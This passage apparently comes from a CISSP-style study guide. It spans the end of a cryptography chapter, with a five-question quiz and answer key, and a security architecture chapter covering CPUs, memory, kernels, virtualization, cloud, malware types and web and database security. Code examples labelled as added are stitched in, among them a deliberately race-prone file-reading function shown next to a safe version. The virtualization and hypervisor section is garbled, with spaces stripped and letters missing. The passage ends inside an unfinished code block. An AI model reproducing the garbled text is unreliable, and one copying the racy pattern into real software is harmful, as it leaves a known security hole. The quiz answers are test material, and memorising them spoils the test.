ESP) in transport mode because the original headers are not encrypted.
Tunnel mode typically uses ESP alone (the original headers are encrypted,
and thus protected, by ESP).

IKE

IPsec can use a variety of encryption algorithms, such as MD5 or SHA-1 for
integrity and triple DES or AES for confidentiality. The Internet Key
Exchange negotiates the algorithm selection process. Two sides of an IPsec
tunnel will typically use IKE to negotiate to the highest and fastest level of
security, selecting AES over single DES for confidentiality if both sides
support AES, for example.
PGP

Pretty Good Privacy (PGP), created by Phil Zimmermann in 1991, brought
asymmetric encryption to the masses. PGP provides the modern suite of
cryptography: confidentiality, integrity, authentication, and nonrepudiation.
It can be used to encrypt emails, documents, or an entire disk drive. PGP
uses a Web of trust model to authenticate digital certificates, instead of relying
on a central Certificate Authority (CA).
S/MIME

MIME (Multipurpose Internet Mail Extensions) provides a standard way to
format email, including character sets and attachments. S/MIME
(Secure/MIME) leverages PKI to encrypt and authenticate MIME-encoded
email. The client or the client's email server (called an "S/MIME gateway") may
perform the encryption.
Escrowed encryption

Escrowed encryption means a third-party organization holds a copy of a
public/private key pair. The private key is often divided into two or more
parts, each held in escrow by different trusted third-party organizations,
which will only release their portion of the key with proper authorization,
such as a court order. This provides separation of duties.
Clipper Chip

The Clipper Chip was the name of the technology used in the Escrowed
Encryption Standard (EES), an effort announced in 1993 by the U.S.
Government to deploy escrowed encryption in telecommunications devices.
The effort created a media firestorm and was abandoned by 1996. The Clipper
Chip used the Skipjack algorithm, a symmetric cipher that uses an 80-bit key.
The algorithm was originally classified as secret.

Summary of exam objectives

Cryptography dates to ancient times but is very much a part of our modern
world, providing security for data in motion and at rest. Modern systems
such as Public Key Infrastructure put all the cryptographic pieces into play
via the use of symmetric, asymmetric, and hash-based encryption to provide
confidentiality, integrity, authentication, and nonrepudiation. You have
learned how the pieces fit together: slower and weaker asymmetric ciphers
such as RSA and Diffie-Hellman are used to exchange faster and stronger
symmetric keys such as AES and DES. The symmetric keys are used as
session keys to encrypt short-term sessions, such as Web connections via
HTTPS. Digital signatures employ public key encryption and hash algorithms
such as MD5 and SHA-1 to provide nonrepudiation, authentication of the
sender, and integrity of the message.

TOP FIVE TOUGHEST QUESTIONS

1. Which algorithm should you use for a low-power device that must employ
digital signatures?
A. AES
B. RSA
C. ECC
D. ElGamal
2. What type of cryptanalysis is primarily used against asymmetric
encryption?
A. Differential cryptanalysis
B. Chosen plaintext
C. Chosen ciphertext
D. Linear cryptanalysis
3. Which of the following attacks analyzes large amounts of
plaintext/ciphertext pairs created with the same key?
A. Known plaintext
B. Differential cryptanalysis
C. Linear cryptanalysis
D. Chosen plaintext
4. Which of the following is true for digital signatures?
A. The sender encrypts the hash with a public key
B. The sender encrypts the hash with a private key
C. The sender encrypts the plaintext with a public key
D. The sender encrypts the plaintext with a private key
5. Which of the following was not an AES finalist?
A. MARS
B. RC6
C. Serpent
D. Blowfish

ANSWERS
1. Correct answer and explanation: C. Answer C is correct; digital signatures
require asymmetric encryption. ECC is the strongest asymmetric algorithm
per bit of key length. This allows shorter key lengths that require less CPU
resources.
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are
incorrect. AES is a symmetric cipher; symmetric ciphers are not used in
digital signatures. RSA is based on factoring composite numbers into their
primes, and ElGamal is based on discrete logarithms. Both methods provide
roughly the same strength per bit and are far weaker per bit than ECC.
2. Correct answer and explanation: C. Answer C is correct; chosen ciphertext
attacks are usually launched against asymmetric cryptosystems, where the
cryptanalyst may choose public documents to decrypt that are signed
(encrypted) with a user's public key.
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are
incorrect. None of these are primarily used against asymmetric encryption.
3. Correct answer and explanation: C. Answer C is correct; linear
cryptanalysis analyzes large amounts of plaintext/ciphertext pairs created
with the same key, trying to deduce information about the key.
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are
incorrect. Linear cryptanalysis is a known plaintext attack, but the question
references linear specifically, making known plaintext attack incorrect.
Differential cryptanalysis seeks to find the "difference" between related
plaintexts that are encrypted. A cryptanalyst chooses the plaintext to be
encrypted during a chosen plaintext attack.
4. Correct answer and explanation: B. Answer B is correct; the sender
generates a hash of the plaintext and encrypts the hash with a private key.
The recipient decrypts the hash with a public key.
Incorrect answers and explanations: A, C, and D. Answers A, C, and D are
incorrect. The sender encrypts the hash with the private key, not public. The
plaintext is hashed and not encrypted.
5. Correct answer and explanation: D. Answer D is correct; Blowfish was not
an AES finalist (Twofish, based on Blowfish, was).
Incorrect answers and explanations: A, B, and C. Answers A, B, and C are
incorrect. MARS, RC6, and Serpent were all AES finalists.

CHAPTER 6

Domain 6: Security Architecture and Design
Abstract
In order to secure a network or system, a basic understanding of the low-level
aspects of systems must be achieved. This chapter is dedicated to Domain 6:
Security Architecture and Design, which details low-level aspects of
operating systems and hardware as they relate to security. Key design
principles such as layering, abstraction, the concept of security domains, and
the ring model architecture are discussed. Familiarity with the operation of a
CPU and memory addressing and protection of the OS via the Trusted
Computing Base (TCB) and kernel is also required for success with this
domain. Forms of distributed computing such as cloud, grid, and peer-to-
peer are also a topic within this chapter. Certification and Accreditation in the
form of the Orange Book, ITSEC, and Common Criteria are discussed.
Finally, common vulnerabilities and attacks including recent content on
mobile device attacks and Web application attacks are also found in Domain
6.

KEYWORDS
Bell-LaPadula; Certification and Accreditation; Hypervisor; Memory (RAM);
Reference monitor; Read-Only Memory (ROM); Trusted Computer System
Evaluation Criteria (TCSEC); Virtualization

Exam Objectives in This Chapter

Secure System Design Concepts
Secure Hardware Architecture
Secure Operating System and Software Architecture
Virtualization and Distributed Computing
System Vulnerabilities, Threats, and Countermeasures
Security Models
Evaluation Methods, Certification, and Accreditation

Introduction
Security Architecture and Design describes fundamental logical hardware,
operating system, and software security components and how to use those
components to design, architect, and evaluate secure computer systems.
Understanding these fundamental issues is critical for an information security
professional.
Security Architecture and Design is a three-part domain. The first part covers
the hardware and software required to have a secure computer system. The
second part covers the logical models required to keep the system secure, and
the third part covers evaluation models that quantify how secure the system
really is.

SECURE SYSTEM DESIGN CONCEPTS

Secure system design transcends specific hardware and software
implementations and represents universal best practices.
Layering

Layering separates hardware and software functionality into modular tiers.
The complexity of an issue such as reading a sector from a disk drive is
contained to one layer (the hardware layer in this case). One layer (such as the
application layer) is not directly affected by a change to another.

Fast Facts
A generic list of security architecture layers is as follows:

1. Hardware
2. Kernel and device drivers
3. Operating system
4. Applications

Abstraction

Abstraction hides unnecessary details from the user. Complexity is the enemy
of security: the more complex a process is, the less secure it is. That said,
computers are tremendously complex machines. Abstraction provides a way
to manage that complexity.
Security domains

A security domain is the list of objects a subject is allowed to access. More
broadly defined, domains are groups of subjects and objects with similar
security requirements. Confidential, Secret, and Top Secret are three security
domains used by the U.S. Department of Defense (DoD), for example.
The ring model

The ring model is a form of CPU hardware layering that separates and protects
domains (such as kernel mode and user mode) from each other. Many CPUs,
such as the Intel x86 family, have four rings, ranging from ring 0 (kernel) to
ring 3 (user), shown in Figure 6.1. The innermost ring is the most trusted, and
each successive outer ring is less trusted.

FIGURE 6.1 The ring model.

Processes communicate between the rings via system calls, which allow
processes to communicate with the kernel and provide a window between
the rings.

Fast Facts
The rings are (theoretically) used as follows:
Ring 0: Kernel
Ring 1: Other OS components that do not fit into ring 0
Ring 2: Device drivers
Ring 3: User applications

While x86 CPUs have four rings and can be used as described above, this
usage is considered theoretical because most x86 operating systems,
including Linux and Windows, use rings 0 and 3 only. A new mode called
hypervisor mode (and informally called "ring -1") allows virtual guests to
operate in ring 0, controlled by the hypervisor one ring "below." The Intel VT
(Intel Virtualization Technology, aka "Vanderpool") and AMD-V (AMD
Virtualization, aka "Pacifica") CPUs support a hypervisor.

SECURE HARDWARE ARCHITECTURE

Secure Hardware Architecture focuses on the physical computer hardware
required to have a secure system. The hardware must provide confidentiality,
integrity, and availability for processes, data, and users.
The system unit and motherboard

The system unit is the computer's case: it contains all of the internal electronic
computer components, including the motherboard, internal disk drives, and
power supply. The motherboard contains hardware including the CPU,
memory slots, firmware, and peripheral slots such as PCI (Peripheral
Component Interconnect) slots. The keyboard unit is the external keyboard.
The computer bus

A computer bus, shown in Figure 6.2, is the primary communication channel
on a computer system. Communication between the CPU, memory, and
input/output devices such as keyboard, mouse, display, etc., occurs via the
bus.

FIGURE 6.2 Simplified computer bus.

The CPU

The Central Processing Unit (CPU) is the "brains" of the computer, capable of
controlling and performing mathematical calculations. Ultimately, everything
a computer does is mathematical: adding numbers (which can be extended to
subtraction, multiplication, division, etc.), performing logical operations,
accessing memory locations by address, etc. CPUs are rated by the number of
clock cycles per second. A 2.4 GHz Pentium 4 CPU has 2.4 billion clock cycles
per second.
Arithmetic logic unit and control unit

The arithmetic logic unit (ALU) performs mathematical calculations: it
"computes." It is fed instructions by the control unit, which acts as a traffic
cop, sending instructions to the ALU.
Fetch and execute

CPUs fetch machine language instructions (such as "add 1 + 1") and execute
them (add the numbers, for an answer of 2). The fetch and execute (also called
"Fetch, Decode, Execute," or FDX) process actually takes four steps:
1. Fetch instruction 1
2. Decode instruction 1
3. Execute instruction 1
4. Write (save) result 1
These four steps take one clock cycle to complete.
Pipelining

Pipelining combines multiple steps into one combined process, allowing
simultaneous fetch, decode, execute, and write steps for different instructions.
Each part is called a pipeline stage; the pipeline depth is the number of
simultaneous stages that may be completed at once.
Given our previous fetch and execute example of adding 1 + 1, a CPU without
pipelining would have to wait an entire cycle before performing another
computation. A four-stage pipeline can combine the stages of four other
instructions:
1. Fetch instruction 1
2. Fetch instruction 2, decode instruction 1
3. Fetch instruction 3, decode instruction 2, execute instruction 1
4. Fetch instruction 4, decode instruction 3, execute instruction 2, write (save)
result 1
5. Fetch instruction 5, decode instruction 4, execute instruction 3, write (save)
result 2, etc.
Pipelining is like an automobile assembly line: instead of building one car at a
time, from start to finish, lots of cars enter the assembly pipeline, and discrete
phases (like installing the tires) occur on one car after another. This increases
the throughput.
Interrupts

An interrupt indicates that an asynchronous event has occurred. CPU
interrupts are a form of hardware interrupt that cause the CPU to stop
processing its current task, save the state, and begin processing a new
request. When the new task is complete, the CPU will complete the prior task.
Processes and threads

A process is an executable program and its associated data loaded and
running in memory. A heavyweight process (HWP) is also called a task. A
parent process may spawn additional child processes called threads. A thread
is a lightweight process (LWP). Threads are able to share memory, resulting
in lower overhead compared to heavyweight processes.
Multitasking and multiprocessing

Applications run as processes in memory, comprised of executable code and
data. Multitasking allows multiple tasks (heavyweight processes) to run
simultaneously on one CPU. Older and simpler operating systems, such as
MS-DOS, are non-multitasking: they run one process at a time. Most modern
operating systems, such as Linux and Windows XP, support multitasking.

Exam Warning
Some sources refer to other terms related to multitasking, including
multiprogramming and multithreading. Multiprogramming is multiple
programs running simultaneously on one CPU; multitasking is multiple
tasks (processes) running simultaneously on one CPU, and
multithreading is multiple threads (lightweight processes) running
simultaneously on one CPU.
Multiprogramming is an older form of multitasking; many sources use
the two terms synonymously. This book will use the term multitasking
to refer to multiple simultaneous processes on one CPU.

Multiprocessing has a fundamental difference from multitasking: it runs
multiple processes on multiple CPUs. Two types of multiprocessing are
Symmetric Multiprocessing (SMP) and Asymmetric Multiprocessing (AMP,
some sources use ASMP). SMP systems have one operating system to manage
all CPUs. AMP systems have one operating system image per CPU,
essentially acting as independent systems.
CISC and RISC

CISC (Complex Instruction Set Computer) and RISC (Reduced Instruction Set
Computer) are two forms of CPU design. CISC uses a large set of complex
machine language instructions, while RISC uses a reduced set of simpler
instructions. x86 CPUs (among many others) are CISC; ARM (used in many
cell phones and PDAs), PowerPC, SPARC, and others are RISC.
Memory

Memory is a series of on-off switches representing bits: 0s (off) and 1s (on).
Memory may be chip-based and disk-based or use other media such as tape.
RAM is Random Access Memory: "random" means the CPU may randomly
access (jump to) any location in memory. Sequential memory (such as tape)
must sequentially read memory, beginning at offset zero to the desired
portion of memory. Volatile memory (such as RAM) loses integrity after a
power loss; nonvolatile memory (such as ROM, disk, or tape) maintains
integrity without power.
Real (or primary) memory, such as RAM, is directly accessible by the CPU
and is used to hold instructions and data for currently executing processes.
Secondary memory, such as disk-based memory, is not directly accessible.
Cache memory

Cache memory is the fastest memory on the system, required to keep up with
the CPU as it fetches and executes instructions. The data most frequently
used by the CPU is stored in cache memory. The fastest portion of the CPU
cache is the register file, which contains multiple registers. Registers are small
storage locations used by the CPU to store instructions and data.
The next fastest form of cache memory is Level 1 cache, located on the CPU
itself. Finally, Level 2 cache is connected to (but outside) the CPU. SRAM
(Static Random Access Memory) is used for cache memory.
RAM and ROM

RAM is volatile memory used to hold instructions and data of currently
running programs. It loses integrity after loss of power. RAM memory
modules are installed into slots on the computer motherboard.
ROM (Read-Only Memory) is nonvolatile: data stored in ROM maintains
integrity after loss of power. A computer Basic Input Output System (BIOS)
firmware is stored in ROM. While ROM is "read only," some types of ROM
may be written to via flashing, as we will see shortly in Section "Flash
memory."
DRAM and SRAM

Static Random Access Memory (SRAM) is expensive and fast memory that
uses small latches called "flip-flops" to store bits. Dynamic Random Access
Memory (DRAM) stores bits in small capacitors (like small batteries) and is
slower and cheaper than SRAM. The capacitors used by DRAM leak charge
and must be continually refreshed to maintain integrity, typically every few
to few hundred milliseconds, depending on the type of DRAM. Refreshing
reads and writes the bits back to memory. SRAM does not require refreshing
and maintains integrity as long as power is supplied.
Memory protection

Memory protection prevents one process from affecting the confidentiality,
integrity, or availability of another. This is a requirement for secure multiuser
(more than one user logged in simultaneously) and multitasking (more than
one process running simultaneously) systems.
Process isolation

Process isolation is a logical control that attempts to prevent one process from
interfering with another. This is a common feature among multiuser
operating systems such as Linux, UNIX, or recent Microsoft Windows
operating systems. Older operating systems such as MS-DOS provide no
process isolation. A lack of process isolation means a crash in any MS-DOS
application could crash the entire system.
Hardware segmentation

Hardware segmentation takes process isolation one step further by mapping
processes to specific memory locations. This provides more security than
(logical) process isolation alone.
Virtual memory

Virtual memory provides virtual address mapping between applications and
hardware memory. Virtual memory provides many functions, including
multitasking (multiple tasks executing at once on one CPU), allowing
multiple processes to access the same shared library in memory, swapping,
and others.
Swapping and paging

Swapping uses virtual memory to copy contents in primary memory (RAM) to
or from secondary memory (not directly addressable by the CPU, on disk).
Swap space is often a dedicated disk partition that is used to extend the
amount of available memory. If the kernel attempts to access a page (a fixed-
length block of memory) stored in swap space, a page fault occurs (an error
that means the page is not located in RAM), and the page is "swapped" from
disk to RAM.
Firmware

Firmware stores small programs that do not change frequently, such as a
computer's BIOS (discussed below) or a router's operating system and saved
configuration. Various types of ROM chips may store firmware, including
PROM, EPROM, and EEPROM.
PROM (Programmable Read-Only Memory) can be written to once, typically
at the factory. EPROM (Erasable Programmable Read-Only Memory) and
EEPROM (Electrically Erasable Programmable Read-Only Memory) may be
"flashed," or erased and written to multiple times.
A Programmable Logic Device (PLD) is a field-programmable device, which
means it is programmed after it leaves the factory. EPROMs, EEPROMs, and
flash memory are examples of PLDs.
Flash memory

Flash memory (such as USB thumb drives) is a specific type of EEPROM used
for small portable disk drives. The difference is any byte of an EEPROM may
be written, while flash drives are written by (larger) sectors. This makes flash
memory faster than EEPROMs, but still slower than magnetic disks.
BIOS

The IBM PC-compatible Basic Input Output System contains code in firmware
that is executed when a PC is powered on. It first runs the Power-On Self-Test
(POST), which performs basic tests, including verifying the integrity of the
BIOS itself, testing the memory, and identifying system devices, among other
tasks. Once the POST process is complete and successful, it locates the boot
sector (for systems that boot off disks), which contains the machine code for
the operating system kernel. The kernel then loads and executes, and the
operating system boots up.

SECURE OPERATING SYSTEM AND SOFTWARE ARCHITECTURE

Secure operating system and software architecture builds upon the secure
hardware described in the previous section, providing a secure interface
between hardware and the applications (and users) that access the hardware.
Operating systems provide memory, resource, and process management.
The kernel

The kernel is the heart of the operating system, which usually runs in ring 0.
It provides the interface between hardware and the rest of the operating
system, including applications. When an IBM-compatible PC is started or
rebooted, the BIOS locates the boot sector of a storage device such as a hard
drive. That boot sector contains the beginning of the software kernel machine
code, which is then executed. Kernels have two basic designs: monolithic and
microkernel.
A monolithic kernel is compiled into one static executable and the entire
kernel runs in supervisor mode. Microkernels are modular kernels. A
microkernel is usually smaller and has less native functionality than a typical
monolithic kernel, but can add functionality via loadable kernel modules.
Reference monitor

A core function of the kernel is running the reference monitor, which mediates
all access between subjects and objects. It enforces the system's security
policy, such as preventing a normal user from writing to a restricted file, such
as the system password file.
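As an added example (not from the study guide) that ties the reference monitor above to the definition of a security domain earlier in the chapter: a toy monitor that mediates every access against a policy, denies anything not explicitly permitted, and records each decision for audit. The subjects, file paths, policy table and `demo` function are all constructed for this example.

```python
"""Added example (not from the study guide): a toy reference monitor that
mediates every access between subjects and objects against a policy, with
default deny and an audit trail. Subjects, objects and policy entries are
constructed; a real reference monitor lives in the kernel and mediates file,
memory and device access, not a Python dictionary."""
from collections import namedtuple

Decision = namedtuple("Decision", "subject action obj allowed")

# Constructed policy: (subject, object) -> set of permitted actions.
# The text's example: a normal user may read, but not write, the password file.
POLICY = {
    ("root", "/etc/passwd"): {"read", "write"},
    ("alice", "/etc/passwd"): {"read"},
    ("alice", "/home/alice/notes.txt"): {"read", "write"},
    ("bob", "/home/bob/todo.txt"): {"read", "write"},
}


class ReferenceMonitor:
    """Every access passes through check(); anything not explicitly permitted
    is denied (fail closed), and every decision is recorded for audit."""

    def __init__(self, policy):
        self._policy = policy
        self.audit_log = []

    def check(self, subject, action, obj):
        """Mediate one access request; returns True only if the policy permits it."""
        allowed = action in self._policy.get((subject, obj), set())
        self.audit_log.append(Decision(subject, action, obj, allowed))
        return allowed

    def security_domain(self, subject):
        """The text's definition: the list of objects a subject may access."""
        return sorted(obj for (subj, obj), acts in self._policy.items()
                      if subj == subject and acts)


def demo():
    """Run the text's scenario plus an access with no policy entry at all."""
    rm = ReferenceMonitor(POLICY)
    results = (
        rm.check("alice", "read", "/etc/passwd"),            # permitted
        rm.check("alice", "write", "/etc/passwd"),           # denied by policy
        rm.check("root", "write", "/etc/passwd"),            # permitted
        rm.check("bob", "read", "/home/alice/notes.txt"),    # denied: no entry
    )
    denied = [d for d in rm.audit_log if not d.allowed]
    return results, len(denied), rm.security_domain("alice")


if __name__ == "__main__":
    print(demo())
```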
Virtualization

Virtualizationaddsasoftwarelayerbetweenanoperatingsystemandthe
underlyingcomputerhardware.Thisallowsmultipleguestoperating
systemstorunsimultaneouslyononephysicalhostcomputer.
Hypervisor

Thekeytovirtualizationsecurityisthehypervisor,whichcontrolsaccess
betweenvirtualguestsandhosthardware.Atype1hypervisor(alsocalled
baremetal)ispartofanoperatingsystemthatrunsdirectlyonhost
hardware.Atype2hypervisorrunsasanapplicationonanormaloperating
system,suchasWindows7.
Manyvirtualizationexploitstargetthehypervisor,includinghypervisor
controlledresourcessharedbetweenhostandguests,orguestandguest.
Theseincludecutandpaste,shareddrives,andsharednetworkconnections.
Virtualization security issues

Virtualizationsoftwareiscomplexandrelativelynew.Asdiscussed
previously,complexityistheenemyofsecurity:thesheercomplexityof
virtualizationsoftwaremaycausesecurityproblems.
Combiningmultipleguestsontoonehostmayalsoraisesecurityissues.
Virtualizationisnoreplacementforarewall:nevercombineguestswith
dierentsecurityrequirements(suchasDMZandinternal)ontoonehost.
Theriskofvirtualizationescape(calledVMEscape,whereana acker
exploitsthehostOSoraguestfromanotherguest)isatopicofrecent
research.Knownvirtualizationescapebugshavebeenpatched,butnew
issuesmayarise.
Manytraditionalnetworkbasedsecuritytools,suchasnetworkintrusion
detectionsystemsandrewalls,canbeblindedbyvirtualization.
Cloud computing

Public cloud computing outsources IT infrastructure, storage, or applications to a third-party provider. A cloud also implies geographic diversity of computer resources. The goal of cloud computing is to allow large providers to leverage their economies of scale to provide computing resources to other companies that typically pay for these services based on their usage.

Three commonly available levels of service provided by cloud providers are Infrastructure as a Service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS). Infrastructure as a Service provides an entire virtualized operating system, which the customer configures from the OS on up. Platform as a Service provides a preconfigured service, such as a Web server supporting PHP, with a preconfigured back-end database. Finally, Software as a Service is completely configured, from the operating system to applications, and the customer simply uses the application. In all three cases, the cloud provider manages hardware, virtualization software, network, backups, etc. See Table 6.1 for typical examples of each.

Table 6.1 Example Cloud Service Levels

Type                                  Example
Infrastructure as a Service (IaaS)    Linux server hosting
Platform as a Service (PaaS)          Web service hosting
Software as a Service (SaaS)          Webmail

Private clouds house data for a single organization and may be operated by a third party or by the organization itself. Government clouds are designed to keep data and resources geographically contained within the borders of one country, designed for the government of the respective country.

Benefits of cloud computing include reduced upfront capital expenditure, reduced maintenance costs, robust levels of service, and overall operational cost savings.

From a security perspective, taking advantage of public cloud computing services requires strict service level agreements and an understanding of new sources of risk. One concern is multiple organizations' guests running on the same host. The compromise of one cloud customer could lead to compromise of other customers.

Organizations should also negotiate specific rights before signing a contract with a cloud computing provider. These rights include the right to audit, the right to conduct a vulnerability assessment, and the right to conduct a penetration test (both electronic and physical) of data and systems placed in the cloud.

Grid computing

Grid computing represents a distributed computing approach that attempts to achieve high computational performance by a nontraditional means. Rather than meeting high-performance computational needs by having large clusters of similar computing resources or a single high-performance system, such as a supercomputer, grid computing attempts to harness the computational resources of a large number of dissimilar devices.

Peer-to-peer

Peer-to-peer (P2P) networks alter the classic client/server computer model. Any system may act as a client, a server, or both, depending on the data needs. Decentralized peer-to-peer networks are resilient: there are no central servers that can be taken offline.

Thin clients

Thin clients are simpler than normal computer systems, which have hard drives, full operating systems, locally installed applications, etc. They rely on central servers, which serve applications and store the associated data. Thin clients allow centralization of applications and their data, as well as the associated security costs of upgrades, patching, data storage, etc. Thin clients may be hardware based (such as diskless workstations) or software based (such as thin client applications).

SYSTEM VULNERABILITIES, THREATS, AND COUNTERMEASURES

System threats, vulnerabilities, and countermeasures describe Security Architecture and Design vulnerabilities, and the corresponding exploits that may compromise system security. We will also discuss countermeasures or mitigating actions that reduce the associated risk.

Covert channels

A covert channel is any communication that violates security policy. Two specific types of covert channels are storage channels and timing channels. A storage channel example uses shared storage, such as a temporary directory, to allow two subjects to signal each other. A covert timing channel relies on the system clock to infer sensitive information.

Buffer overflows

Buffer overflows can occur when a programmer fails to perform bounds checking. Bytes beyond the allocated space will overwrite memory intended to store different data.

TOCTOU/race conditions

Time of Check/Time of Use (TOCTOU) attacks are also called race conditions: an attacker attempts to alter a condition after it has been checked by the operating system, but before it is used.
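
The following is an added illustration, not code from the study guide: it contrasts the check-then-use pattern that creates the TOCTOU window with the race-free pattern of opening first and checking the descriptor actually held. The file names and the helper names (`read_regular_file_racy`, `read_regular_file_safe`, `demo`) are assumptions made for the example.

```python
"""Check-then-use versus open-then-check when reading a file.

Added example (not from the study guide). The vulnerable function inspects a
path and later opens the same path, so the two calls may refer to different
files; the race-free function opens first and inspects the descriptor it
holds, leaving nothing for a race to exchange.
"""
import os
import stat
import tempfile


def read_regular_file_racy(path: str) -> bytes:
    """Vulnerable pattern: the check (lstat) and the use (open) both take a
    path. Between the two calls the path can be repointed: TOCTOU window."""
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError("refusing to read a non-regular file")
    with open(path, "rb") as fh:      # re-resolves the path a second time
        return fh.read()


def read_regular_file_safe(path: str) -> bytes:
    """Race-free pattern: open without following a final symlink, then check
    the open descriptor. Check and use refer to the same file object."""
    flags = os.O_RDONLY | getattr(os, "O_NOFOLLOW", 0) | getattr(os, "O_CLOEXEC", 0)
    fd = os.open(path, flags)
    try:
        st = os.fstat(fd)             # inspects the file we hold, not the path
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("refusing to read a non-regular file")
        with os.fdopen(fd, "rb") as fh:   # fdopen takes ownership of fd
            fd = -1
            return fh.read()
    finally:
        if fd != -1:
            os.close(fd)


def demo() -> dict:
    """Constructed scenario: a regular file and a symlink pointing at it."""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "data.txt")
        with open(target, "wb") as fh:
            fh.write(b"sensitive")
        link = os.path.join(tmp, "link")
        os.symlink(target, link)
        results = {"regular": read_regular_file_safe(target)}
        try:
            read_regular_file_safe(link)
            results["symlink"] = "followed"
        except OSError:               # O_NOFOLLOW makes open() fail on a symlink
            results["symlink"] = "refused"
        return results


if __name__ == "__main__":
    print(demo())
```

The safe variant needs a POSIX platform for `O_NOFOLLOW`; the general rule it illustrates is to make every decision on the handle you will use, never on a name that can be re-resolved.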
Maintenance Hooks

Maintenance Hooks are a type of backdoor; they are shortcuts installed by system designers and programmers to allow developers to bypass normal system checks during development, such as requiring users to authenticate.

Malicious code (malware)

Malicious code or malware is the generic term for any type of software that attacks an application or system. There are many types of malicious code; viruses, worms, Trojans, and logic bombs can cause damage to targeted systems.

Zero-day exploits are malicious code (a threat) for which there is no vendor-supplied patch (meaning there is an unpatched vulnerability).

Computer viruses

Computer viruses are malware that does not spread automatically: they require a carrier (usually a human).

Fast Facts
Types of viruses include:
Macro virus: virus written in macro language (such as Microsoft Office or Microsoft Excel macros)
Boot sector virus: virus that infects the boot sector of a PC, which ensures that the virus loads upon system startup
Polymorphic virus: a virus that changes its code upon infection of a new system, attempting to evade signature-based antivirus software
Multipartite virus: a virus that spreads via multiple vectors. Also called multipart virus.

Worms

Worms are malware that self-propagates (spreads independently). Worms typically cause damage two ways: first by the malicious code they carry; the second type of damage is loss of network availability due to aggressive self-propagation.

Trojans

A Trojan (also called a Trojan horse) is malware that performs two functions: one benign (such as a game) and one malicious. The term derives from the Trojan horse described in Virgil's poem The Aeneid.

Rootkits

A rootkit is malware that replaces portions of the kernel and/or operating system. A user-mode rootkit operates in ring 3 on most systems, replacing operating system components in userland.

A kernel-mode rootkit replaces the kernel or loads malicious loadable kernel modules. Kernel-mode rootkits operate in ring 0 on most operating systems.

Web architecture and attacks

The World Wide Web of 10 years ago was a simpler Web: most Web pages were static, rendered in HTML. The advent of Web 2.0, with dynamic content, multimedia, and user-created data, has increased the attack surface of the Web: creating more attack vectors.

Applets

Applets are small pieces of mobile code that are embedded in other software such as Web browsers. Unlike HTML (HyperText Markup Language), which provides a way to display content, applets are executables. The primary security concern is that applets are downloaded from servers and then run locally. Malicious applets may be able to compromise the security of the client.

Applets can be written in a variety of programming languages; two prominent applet languages are Java (by Oracle/Sun Microsystems) and ActiveX (by Microsoft). The term applet is used for Java, and control for ActiveX, though they are functionally similar.

Java

Java is an object-oriented language used not only to write applets but also as a general-purpose programming language. Java bytecode is platform independent: it is interpreted by the Java virtual machine (JVM).

Java applets run in a sandbox, which segregates the code from the operating system. The sandbox is designed to prevent an attacker who is able to compromise a Java applet from accessing system files, such as the password file.

ActiveX

ActiveX controls are the functional equivalent of Java applets. They use digital certificates instead of a sandbox to provide security. Unlike Java, ActiveX is a Microsoft technology that works on Microsoft Windows operating systems only.

OWASP

The Open Web Application Security Project (OWASP; see http://www.owasp.org) represents one of the best application security resources. OWASP provides a tremendous number of free resources dedicated to improving organizations' application security posture. One of their best-known projects is the OWASP Top 10 project, which provides consensus guidance on what are considered to be the ten most significant application security risks. The OWASP Top 10 is available at https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project.

In addition to the wealth of information about application security threats, vulnerabilities, and defenses, OWASP also maintains a number of security tools available for free download including two leading interception proxies: WebScarab and ZAP, the Zed Attack Proxy.

XML and SAML

XML (Extensible Markup Language) is a markup language designed as a standard way to encode documents and data. XML is similar to, but more universal than, HTML. XML is used on the Web, but is not tied to it: XML can be used to store application configuration, output from auditing tools, and many other uses. Extensible means users may use XML to define their own data formats.

Security Assertion Markup Language (SAML) is an XML-based framework for exchanging security information, including authentication data. One goal of SAML is to enable Web single sign-on (SSO) at an Internet scale.

Service-Oriented Architecture

Service-Oriented Architecture (SOA) attempts to reduce application architecture down to a functional unit of a service. SOA is intended to allow multiple heterogeneous applications to be consumers of services. The service can be used and reused throughout an organization rather than built within each individual application that needs the functionality offered by the service.

Services are expected to be platform independent and able to be called in a generic way not dependent upon a particular programming language. The intent is that any application may leverage the service simply by using standard means available within its programming language of choice. Services are typically published in some form of a directory that provides details about how the service can be used and what the service provides.

Though Web services are not the only example, they are the most common example provided for the SOA model. XML or JSON (JavaScript Object Notation) is commonly used for the underlying data structures of Web services, SOAP (originally an acronym for Simple Object Access Protocol, but now simply SOAP) or REST (Representational State Transfer) provides the connectivity, and the WSDL (Web Services Description Language) provides details about how the Web services are to be invoked.

Mobile device attacks

A recent information security challenge is mobile devices ranging from USB flash drives to laptops that are infected with malware outside of a security perimeter and then carried into an organization. Traditional network-based protection, such as firewalls and intrusion detection systems, is powerless to prevent the initial attack.

Mobile device defenses

Defenses include policy administrative controls such as restricting the use of mobile devices via policy. Technical controls to mitigate infected mobile computers include requiring authentication at OSI model layer 2 via 802.1X. 802.1X authentication may be bundled with additional security functionality, such as verification of current patches and antivirus signatures.

Another mobile device security concern is the loss or theft of a mobile device, which threatens confidentiality, integrity, and availability of the device and the data that resides on it. Backups can assure the availability and integrity of mobile data.

Full disk encryption (also known as whole disk encryption) should be used to ensure the confidentiality of mobile device data.

Remote wipe capability is another critical control, which describes the ability to erase (and sometimes disable) a mobile device that is lost or stolen.

Database security

Databases present unique security challenges. The sheer amount of data that may be housed in a database requires special security consideration. The logical connections database users may make by creating, viewing, and comparing records may lead to inference and aggregation attacks, requiring database security precautions such as inference controls and polyinstantiation.

Polyinstantiation

Polyinstantiation allows two different objects to have the same name. The name is based on the Latin roots for multiple (poly) and instances (instantiation). Database polyinstantiation means two rows may have the same primary key, but different data.
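
As an added illustration of database polyinstantiation (this is example code, not from the study guide or any database product), the table below keeps one row per classification level under a single primary key and returns to each subject the most sensitive instance its clearance allows. The integer levels, the table class and the sample cargo records are constructed for the example.

```python
"""Polyinstantiated relation: one primary key, one row per classification.

Added example (not from the study guide). Levels are integers, larger
meaning more sensitive. A subject sees the highest-classified instance of
a key that its clearance dominates and is not told that a higher instance
exists, so a low-level write cannot be used to probe for a high-level row.
"""
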